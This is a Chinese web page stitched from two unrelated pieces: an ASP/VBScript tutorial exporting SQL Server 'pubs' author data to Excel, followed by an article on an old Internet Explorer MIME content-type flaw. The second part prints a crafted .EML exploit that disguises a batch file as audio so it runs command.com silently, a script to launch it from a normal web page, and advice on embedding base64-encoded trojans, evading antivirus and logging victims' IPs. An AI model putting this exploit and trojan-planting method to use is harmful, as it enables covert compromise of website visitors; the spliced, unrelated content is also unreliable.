Microsoft Windows NT Server 4.0 SP3
Microsoft Internet Information Server (IIS) 4.0 版或更高版本
Microsoft SQL Server 6.5 或更高版本
Microsoft Excel 97、Excel 2000 和 Excel 2002
分步过程
使用 ODBC 控制面板小程序创建一个名为“pubs”的系统 DSN。将 DSN 设置为引用您的本地 SQL Server,使用 SQL Server 身份验证,并使用“pubs”作为默认数据库。pubs 数据库的默认登录 ID 是 sa,没有密码。
使用 Notepad.exe 在您的 IIS 主目录(例如 inetpub\wwwroot)中创建一个名为 XlTest.asp 的文件,并向其中添加以下内容:
<%@ Language=VBScript %>
<%
'Change HTML header to specify Excel's MIME content type
Response.Buffer = TRUE
Response.ContentType = "application/vnd.ms-excel"
%>
<HTML>
<BODY>
Here is the info you requested.<p>
<%
' Create ADO Connection object
dim myConnection
set myConnection = CreateObject("ADODB.Connection")
' Open SQL Server Pubs database...
' myConnection.Open "DSN=pubsUID=sa"
' Get a recordset of info from Authors table...
sqlStr = "SELECT au_fname,au_lname,phone FROM authors"
set rsAuthors = myConnection.Execute(sqlStr)
%>
<!-- Our table which will be translated into an Excel spreadsheet -->
<TABLE WIDTH=75% BORDER=1 CELLSPACING=1 CELLPADDING=1>
<TR>
<TD><font size=+2>First Name</font></TD>
<TD><font size=+2>Last Name</font></TD>
<TD><font size=+2>Phone</font></TD>
</TR>
<!-- server-side loop adding Table entries -->
<% do while not rsAuthors.EOF %>
<TR>
<TD><%=rsAuthors("au_fname")%></TD>
<TD><%=rsAuthors("au_lname")%></TD>
<TD><%=rsAuthors("phone")%></TD>
</TR>
<% rsAuthors.MoveNext
loop
' Clean up
rsAuthors.Close
set rsAuthors = Nothing
myConnection.Close
set myConnection = Nothing
%>
</TABLE>
</BODY>
</HTML>
保存 XlTest.asp,然后从客户端浏览器查看它。
相信对微软件IE浏览器的这个重大安全漏洞,很多人都有所耳闻。就其原理来说,IE浏览器在处理MIME头中"content-type"处特定的某些类型时存在问题。由此导至功击者可以得用这个缺陷在IE客户端执行任意指令,或EXE,BAT等文件!具体一些来说,对方可以构造如下一个特殊的.EML文件:
Content-Type: multipart/relatedboundary="1"
--1
Content-Type: multipart/alternativeboundary="2"
--2
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable
<iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe>
--1
Content-Type: audio/x-wavname="test.bat"
Content-Transfer-Encoding: base64
Content-ID: <THE-CID>
command.com
一般情况下,EML文件是与OE相关联的,但由于 这封邮件是HTML格式的,所以最终还是调用IE对其进行解释。而此处,IE会错误的处理"content-type:audio/x-wav"
,从而导至test.bat无提示下载,并自动执行!
具体对其利用时,可以在一个正常的网页源码中加入这样的指令:
<script language="java script">
window.open("test.eml",null,resizable=no,top=1000,left=1000")
</script>
上面EML源文件中是对.bat文件的调用。如果要对.EXE文件调用,则需要将文件经base64编码。手动做这项工作几乎是不可能的事,这里推荐给各位一个专门做此工作的软件EMl.EXE。它可以轻松实现对EXE文件的base64编码!聪明的朋友也许早已经想到可以在这里使用木马了,的确这是个"不错"的想法。而为了使你隐藏在网页中的木马不被杀毒软件发现,最好先对此木马做些手脚,具体方法参见绿色兵团谭术写的《反特征码及特洛伊木马躲避查毒软件技术详解》。
也许有人想到,自己如此精心策划,可是如何知道有谁浏览过自己的网页中了木马呢?简单!太极链的计数器不是有记录浏览者IP的功能吗?在网页中加个这样的计数器不就OK了吗?
Notice:据传网上早有人用过累似的方法,在下收集有关资料小做分析后做出此文,意在对其揭示,以提高广大网民上网警惕性!如有人依此法"为非作歹",皆与本人无关,请勿自误!:P
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)